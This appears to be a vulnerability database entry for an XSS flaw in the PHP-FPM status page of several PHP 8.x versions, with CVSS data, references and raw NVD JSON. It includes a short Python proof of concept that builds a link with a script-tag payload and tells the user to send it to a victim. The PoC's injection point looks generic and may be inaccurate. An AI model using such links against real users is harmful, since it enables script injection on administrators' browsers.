CVE-2026-6735

Description

In PHP versions 8.2.* before 8.2.31, 8.3.* before 8.3.31, 8.4.* before 8.4.21, 8.5.* before 8.5.6, due to improper sanitation of user data, it allows an attacker to compose an URL, which will cause the target to execute arbitrary JavaScript code (XSS) on the target's machine when the target is viewing the PHP-FPM status page.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:php:php:*:*:*:*:*:*:*:* - VULNERABLE

PHP 8.2.* < 8.2.31

PHP 8.3.* < 8.3.31

PHP 8.4.* < 8.4.21

PHP 8.5.* < 8.5.6

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Proof of Concept (PoC) for CVE-2026-6735
# This script demonstrates how to generate a malicious URL to exploit the XSS vulnerability.

import urllib.parse

def generate_exploit_url(base_url, payload):
    """
    Constructs a URL that triggers the XSS vulnerability on the PHP-FPM status page.
    The vulnerability is triggered when a user views the status page with unsanitized input.
    """
    # The status page is typically /status
    # Attackers can inject payloads via query parameters that are reflected in the response
    exploit_url = f"{base_url}/status?{urllib.parse.quote(payload)}"
    return exploit_url

# Malicious JavaScript payload (e.g., displaying an alert)
xss_payload = "<script>alert('CVE-2026-6735 XSS Exploited');</script>"

target = "http://vulnerable-php-fpm-server"

print(f"Send the following link to the victim:")
print(generate_exploit_url(target, xss_payload))

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-6735
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-6735
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-6735/
[4] VulDB https://vuldb.com/cve/CVE-2026-6735
[5] https://github.com/php/php-src/security/advisories/GHSA-7qg2-v9fj-4mwv

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-6735", "sourceIdentifier": "[email protected]", "published": "2026-05-10T05:16:11.213", "lastModified": "2026-05-12T17:43:15.637", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In PHP versions 8.2.* before 8.2.31, 8.3.* before 8.3.31, 8.4.* before 8.4.21, 8.5.* before 8.5.6, due to improper sanitation of user data, it allows an attacker to compose an URL, which will cause the target to execute arbitrary JavaScript code (XSS) on the target's machine when the target is viewing the PHP-FPM status page."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:P/AU:Y/R:X/V:X/RE:L/U:Amber", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "PRESENT", "Automatable": "YES", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "LOW", "providerUrgency": "AMBER"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:php:php:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.2.0", "versionEndExcluding": "8.2.31", "matchCriteriaId": "A892B6FF-F4EB-40C6-8DD0-D2246A71D271"}, {"vulnerable": true, "criteria": "cpe:2.3:a:php:php:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.3.0", "versionEndExcluding": "8.3.31", "matchCriteriaId": "9DBBB51D-F0C4-4CEC-9B6B-33D0BF0044A5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:php:php:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.4.0", "versionEndExcluding": "8.4.21", "matchCriteriaId": "BA663C03-392C-41CC-BD11-4A1245203C42"}, {"vulnerable": true, "criteria": "cpe:2.3:a:php:php:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.5.0", "versionEndExcluding": "8.5.6", "matchCriteriaId": "6101DA12-5AA1-4882-A52A-61FB74254F9A"}]}]}], "references": [{"url": "https://github.com/php/php-src/security/advisories/GHSA-7qg2-v9fj-4mwv", "source": "[email protected]", "tags": ["Vendor Advisory", "Exploit"]}]}}